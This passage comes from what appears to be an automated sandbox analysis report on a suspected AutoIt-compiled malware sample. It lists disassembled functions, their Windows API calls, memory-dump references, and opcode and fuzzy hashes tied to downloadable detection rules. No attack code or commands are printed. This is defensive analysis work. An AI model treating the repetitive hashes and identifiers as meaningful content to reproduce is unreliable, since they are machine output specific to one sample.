                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3277943733-0
                                                                                                                            • Opcode ID: 561303e55a89d0224200214a04bf2a0989bdea7f24ceb6ad9575b479d9243ace
                                                                                                                            • Instruction ID: 0a3da5e7ef4b57118f729dddec6a849c3f5a181ee02fe0bd3811e8e249dc0a12
                                                                                                                            • Opcode Fuzzy Hash: 561303e55a89d0224200214a04bf2a0989bdea7f24ceb6ad9575b479d9243ace
                                                                                                                            • Instruction Fuzzy Hash: 62F0FEF25403087EE6106765BC0AFBB7A9CEB0A795F044021FA18E5192F7B65C10B7B8
                                                                                                                            Function 00F46BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00F46BE6
                                                                                                                              • Part of subcall function 00F476C4: _memset.LIBCMT ref: 00F476F9
                                                                                                                            • _memmove.LIBCMT ref: 00F46C09
                                                                                                                            • _memset.LIBCMT ref: 00F46C16
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00F46C26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48991266-0
                                                                                                                            • Opcode ID: f92a733aba62e261f4426c9bd9524ce0caa97d45b88b6cff355dfd2b4a246cd0
                                                                                                                            • Instruction ID: c12bb424e6ab47a39f390aac292f7e7d1ddb008d7a7a5d28213a77cd2986e06e
                                                                                                                            • Opcode Fuzzy Hash: f92a733aba62e261f4426c9bd9524ce0caa97d45b88b6cff355dfd2b4a246cd0
                                                                                                                            • Instruction Fuzzy Hash: 70F0543A100104ABCF016F55EC85A4ABF2AEF45360F048061FE085E267C775E811EBB4
                                                                                                                            Function 00EE2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000008), ref: 00EE2231
                                                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00EE223B
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00EE2250
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00EE2258
                                                                                                                            • GetWindowDC.USER32(?,00000000), ref: 00F1BE83
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F1BE90
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00F1BEA9
                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00F1BEC2
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00F1BEE2
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F1BEED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1946975507-0
                                                                                                                            • Opcode ID: d06350e350f0a61cd69148e8199eec871536f0c13a1eef24179f8dd312b288fc
                                                                                                                            • Instruction ID: bfabeb45239bb779dfb7081f2a302612bc152a28550b94eea2cae80a71acc7d7
                                                                                                                            • Opcode Fuzzy Hash: d06350e350f0a61cd69148e8199eec871536f0c13a1eef24179f8dd312b288fc
                                                                                                                            • Instruction Fuzzy Hash: 32E03932904248EBDB215FA4FC0D7D83B11EB16336F048366FA79980E187B24984EB12
                                                                                                                            Function 00F38712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00F3871B
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F382E6), ref: 00F38722
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F382E6), ref: 00F3872F
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F382E6), ref: 00F38736
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3974789173-0
                                                                                                                            • Opcode ID: 05a5055108809f38c29570af9889a7f8ded329545c13da6072c884707855eb37
                                                                                                                            • Instruction ID: 4b92c65e68f24d886a5dd09f7e9003b679d947523c5151ae55f3d44f30d72635
                                                                                                                            • Opcode Fuzzy Hash: 05a5055108809f38c29570af9889a7f8ded329545c13da6072c884707855eb37
                                                                                                                            • Instruction Fuzzy Hash: 6FE08637A15316ABD7205FB07D0DB563BACEF507E1F144828F245CB040DA78844AEB50
                                                                                                                            Function 00F05DAC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00F05DAD
                                                                                                                              • Part of subcall function 00F099C4: GetLastError.KERNEL32(00000000,00F00DD3,00F08B2D,00F057A3,?,?,00F00DD3,?), ref: 00F099C6
                                                                                                                              • Part of subcall function 00F099C4: __calloc_crt.LIBCMT ref: 00F099E7
                                                                                                                              • Part of subcall function 00F099C4: __initptd.LIBCMT ref: 00F09A09
                                                                                                                              • Part of subcall function 00F099C4: GetCurrentThreadId.KERNEL32 ref: 00F09A10
                                                                                                                              • Part of subcall function 00F099C4: SetLastError.KERNEL32(00000000,00F00DD3,?), ref: 00F09A28
                                                                                                                            • CloseHandle.KERNEL32(?,?,00F05D8C), ref: 00F05DC1
                                                                                                                            • __freeptd.LIBCMT ref: 00F05DC8
                                                                                                                            • ExitThread.KERNEL32 ref: 00F05DD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4169687693-0
                                                                                                                            • Opcode ID: e061b8d4deee923e19fa392220c91826e61e3623905961b7bdd49aadc582bf0b
                                                                                                                            • Instruction ID: 9ca0e8058b657de18895cbc96542b29deca9da2e0d856f3d5a4d626673536207
                                                                                                                            • Opcode Fuzzy Hash: e061b8d4deee923e19fa392220c91826e61e3623905961b7bdd49aadc582bf0b
                                                                                                                            • Instruction Fuzzy Hash: 8AD0A771406F1147C23227309C0E62A77509F00B71B444219F075451F1DBE45803BE41
                                                                                                                            Function 00F3B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00F3B4BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContainedObject
                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                            • API String ID: 3565006973-3941886329
                                                                                                                            • Opcode ID: 9f796b9f3492449f51b2e3e362240185331fa5202e3ff12a034dc7583a8d8f78
                                                                                                                            • Instruction ID: e10588e56d283d272a60a29a546b52b5a01fcfc4182c3d4ba6c9bb86cebb0fdb
                                                                                                                            • Opcode Fuzzy Hash: 9f796b9f3492449f51b2e3e362240185331fa5202e3ff12a034dc7583a8d8f78
                                                                                                                            • Instruction Fuzzy Hash: 5B914971600701EFDB54DF64C894B6ABBE5FF48720F24856EEA4ACB291DB70E841DB60
                                                                                                                            Function 00F4AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • __wcsnicmp.LIBCMT ref: 00F4B02D
                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F4B0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                            • String ID: LPT
                                                                                                                            • API String ID: 3222508074-1350329615
                                                                                                                            • Opcode ID: 9ef7e69b1994223e97d9e2d7711cf6b25f769cee6345b7b6ee8cc0ac8d6ad790
                                                                                                                            • Instruction ID: ed0718461f56150eea69952fcb6d0e3618e299b489f2f8d4a16c9999c5b49eed
                                                                                                                            • Opcode Fuzzy Hash: 9ef7e69b1994223e97d9e2d7711cf6b25f769cee6345b7b6ee8cc0ac8d6ad790
                                                                                                                            • Instruction Fuzzy Hash: A1615075E00219AFCB14DF98C891EAEBBF4AF48310F104069F956AB352D770EE44EB54
                                                                                                                            Function 00EF2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00EF2968
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EF2981
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                            • Opcode ID: 6165d5cae2510d1c58f8efebed8fb3b833e0da38a2a7a7e545948d83d64f2a89
                                                                                                                            • Instruction ID: 77a14c026c00c6c2a18e06ca0c27f87a31ca047d21ff78e076a608e416a7d0ed
                                                                                                                            • Opcode Fuzzy Hash: 6165d5cae2510d1c58f8efebed8fb3b833e0da38a2a7a7e545948d83d64f2a89
                                                                                                                            • Instruction Fuzzy Hash: 5A5148714087889BD320EF51DC86BAFBBE8FF85344F42885DF2D8510A2DB719529CB66
                                                                                                                            Function 00F49734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4F0B: __fread_nolock.LIBCMT ref: 00EE4F29
                                                                                                                            • _wcscmp.LIBCMT ref: 00F49824
                                                                                                                            • _wcscmp.LIBCMT ref: 00F49837
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                                                            • String ID: FILE
                                                                                                                            • API String ID: 4029003684-3121273764
                                                                                                                            • Opcode ID: 1c5355723744e1f48ac51facaf5b8b89428137d9c0aa366c76662ec658610097
                                                                                                                            • Instruction ID: b8ca12610c7b92625b3a2b7ebe7cc520752eb03837d204181608aa9c23c85e9c
                                                                                                                            • Opcode Fuzzy Hash: 1c5355723744e1f48ac51facaf5b8b89428137d9c0aa366c76662ec658610097
                                                                                                                            • Instruction Fuzzy Hash: 1441B171B0420ABADF219AA5CC45FEFBBFDDF86710F000069B904B7180DAB5AA04DB61
                                                                                                                            Function 00F5258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F5259E
                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F525D4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CrackInternet_memset
                                                                                                                            • String ID: |
                                                                                                                            • API String ID: 1413715105-2343686810
                                                                                                                            • Opcode ID: ddf0b8f8a1cbad489a2a7f72d692235641cc76d46c5be980b5a8994b6e5e428f
                                                                                                                            • Instruction ID: 20b18bc01fa9df29d70561b9e31f42f8585651865018f81eba7a8b21bc892e63
                                                                                                                            • Opcode Fuzzy Hash: ddf0b8f8a1cbad489a2a7f72d692235641cc76d46c5be980b5a8994b6e5e428f
                                                                                                                            • Instruction Fuzzy Hash: F1311471800159ABCF41AFA1CC85EEEBFB8FF09310F10116AED14B6162EA315A56EB60
                                                                                                                            Function 00F67A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F67B61
                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F67B76
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: '
                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                            • Opcode ID: 16f77eaec398e723d337afc7fd2720a0bb8c753e231ed1a92d388b0f58935c10
                                                                                                                            • Instruction ID: 77ff7786e2ae6cf2a379fe88a2460d961c9e95ffd5ad0bb7c059dc5517cb99e5
                                                                                                                            • Opcode Fuzzy Hash: 16f77eaec398e723d337afc7fd2720a0bb8c753e231ed1a92d388b0f58935c10
                                                                                                                            • Instruction Fuzzy Hash: 1B413874A0430A9FDB14DFA5C880BEABBB9FF09314F10016AE904EB395E770A941DF90
                                                                                                                            Function 00F66A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00F66B17
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F66B53
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                            • Opcode ID: 504baeaa438857103b98f07270eb8176b01321ad525375dc5b6665c858b7fb71
                                                                                                                            • Instruction ID: 34d45263bb8193aab2f0a9fc932b35e3e9ef49792a9f9e8d6571e24ab267dcc0
                                                                                                                            • Opcode Fuzzy Hash: 504baeaa438857103b98f07270eb8176b01321ad525375dc5b6665c858b7fb71
                                                                                                                            • Instruction Fuzzy Hash: 6D31CF71200208AEDB109F65DC80BFB73A8FF88720F109619F9A5D3191DA35AC81EB60
                                                                                                                            Function 00F428A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42911
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F4294C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: 36b4961165eadc50025f980c2ae02c39a95ea10b60f5872b28b16e84c35b08fd
                                                                                                                            • Instruction ID: df5636ff652d3a71614f7173787c837c2206df4aaf5f8245722ffdd6f6b709f3
                                                                                                                            • Opcode Fuzzy Hash: 36b4961165eadc50025f980c2ae02c39a95ea10b60f5872b28b16e84c35b08fd
                                                                                                                            • Instruction Fuzzy Hash: 2631BF71A003099BEB64CF58CC85BAEBFB8EF45360F540039FD85A62A1DB749944FB51
                                                                                                                            Function 00F539E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __snwprintf.LIBCMT ref: 00F53A66
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __snwprintf_memmove
                                                                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                            • API String ID: 3506404897-2584243854
                                                                                                                            • Opcode ID: 2adbd229e177116f37bb56b83bf0a557a71073c73a1338c7f13aee8b042540b8
                                                                                                                            • Instruction ID: 54f12303441b353771c9eec3341ba5ccf2402d8d1303517eb0b4ba38583d2dfe
                                                                                                                            • Opcode Fuzzy Hash: 2adbd229e177116f37bb56b83bf0a557a71073c73a1338c7f13aee8b042540b8
                                                                                                                            • Instruction Fuzzy Hash: E621933560021DABCF10EF69CC81AAE77F9EF45780F104454FA55B7182DB34EA46EB61
                                                                                                                            Function 00F666D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F66761
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F6676C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Combobox
